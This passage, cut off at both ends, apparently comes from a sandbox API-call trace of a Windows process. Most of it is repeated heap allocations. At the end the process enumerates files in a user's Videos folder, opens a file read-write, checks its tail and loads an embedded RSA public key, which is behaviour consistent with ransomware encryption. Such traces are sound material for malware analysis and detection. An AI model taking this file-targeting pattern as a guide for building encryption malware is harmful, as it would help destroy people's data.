hHeap=0x2c0000) returned 1 [0198.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.294] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\") returned="M fZX23r02sYWxh\\" [0198.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0198.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0198.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.294] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\") returned="FPzctgqI5yS\\" [0198.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeab18 [0198.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.295] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0198.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeab18 | out: hHeap=0x2c0000) returned 1 [0198.296] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0198.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.296] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0198.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.297] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0198.297] PathFindFileNameW (pszPath="") returned="" [0198.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0198.297] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\m fzx23r02sywxh\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12ac7f00, ftCreationTime.dwHighDateTime=0x1d89cc3, ftLastAccessTime.dwLowDateTime=0x534d2e10, ftLastAccessTime.dwHighDateTime=0x1d89f1b, ftLastWriteTime.dwLowDateTime=0x534d2e10, ftLastWriteTime.dwHighDateTime=0x1d89f1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0198.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0198.302] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12ac7f00, ftCreationTime.dwHighDateTime=0x1d89cc3, ftLastAccessTime.dwLowDateTime=0x534d2e10, ftLastAccessTime.dwHighDateTime=0x1d89f1b, ftLastWriteTime.dwLowDateTime=0x534d2e10, ftLastWriteTime.dwHighDateTime=0x1d89f1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.302] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x156ee70, ftCreationTime.dwHighDateTime=0x1d89c0a, ftLastAccessTime.dwLowDateTime=0xa6d1dc50, ftLastAccessTime.dwHighDateTime=0x1d8a3e1, ftLastWriteTime.dwLowDateTime=0xa6d1dc50, ftLastWriteTime.dwHighDateTime=0x1d8a3e1, nFileSizeHigh=0x0, nFileSizeLow=0x7300, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0yOYfg2VyeKk-r.swf", cAlternateFileName="0YOYFG~1.SWF")) returned 1 [0198.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0198.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.303] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\0yOYfg2VyeKk-r.swf") returned=".swf" [0198.303] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\0yOYfg2VyeKk-r.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\m fzx23r02sywxh\\0yoyfg2vyekk-r.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0198.304] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=29440) returned 1 [0198.304] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0198.308] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x72da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.308] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.311] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.311] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x7300, lpOverlapped=0x0) returned 1 [0198.312] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0198.312] lstrlenA (lpString="-----BEGIN PUBLIC 